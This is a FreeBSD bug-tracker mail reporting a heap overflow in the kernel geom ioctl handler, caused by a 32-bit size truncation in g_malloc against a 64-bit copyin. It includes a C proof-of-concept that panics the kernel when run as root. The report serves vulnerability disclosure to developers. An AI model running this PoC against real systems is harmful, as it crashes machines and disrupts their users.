[Bug 209113] Heap overflow in geom ioctl handler
bugzilla-noreply at freebsd.org
bugzilla-noreply at freebsd.org
Wed Apr 27 22:41:06 UTC 2016
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=209113
Bug ID: 209113
Summary: Heap overflow in geom ioctl handler
Product: Base System
Version: 11.0-CURRENT
Hardware: Any
OS: Any
Status: New
Severity: Affects Only Me
Priority: ---
Component: kern
Assignee: freebsd-bugs at FreeBSD.org
Reporter: cturt at hardenedbsd.org
There is a heap overflow in the `ioctl` handler for `geom`, which is
non-critical since it is only triggerable as `root`.
Essentially, there are no checks on the user supplied `req.narg` value. The
code uses this value to calculate a size by multiplying by `sizeof(struct
gctl_req_arg)`, and then calls `g_malloc` and `copyin`.
`g_malloc` treats its `size` parameter as an `int`:
static __inline void *g_malloc(int size, int flags)
So this size will be truncated to 32 bit, however the `copyin` call will use
the full 64 bit size.
PoC to trigger the bug, resulting in panic (must be run as `root`):
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <geom/geom_ctl.h>
int main(void) {
int result;
struct gctl_req req;
int g;
g = open("/dev/geom.ctl", O_RDONLY);
if(g == -1) {
printf(" [-] Couldn't open geom.ctl!\n");
return 1;
}
req.error = malloc(0x100);
req.lerror = 2;
req.version = GCTL_VERSION;
req.narg = 0x5555556;
req.arg = malloc(0x4000);
memset(req.arg, 'a', 0x4000);
result = ioctl(g, GEOM_CTL, &req);
printf("%d %d\n", result, errno);
free(req.arg);
return 0;
}
--
You are receiving this mail because:
You are the assignee for the bug.
More information about the freebsd-bugs
mailing list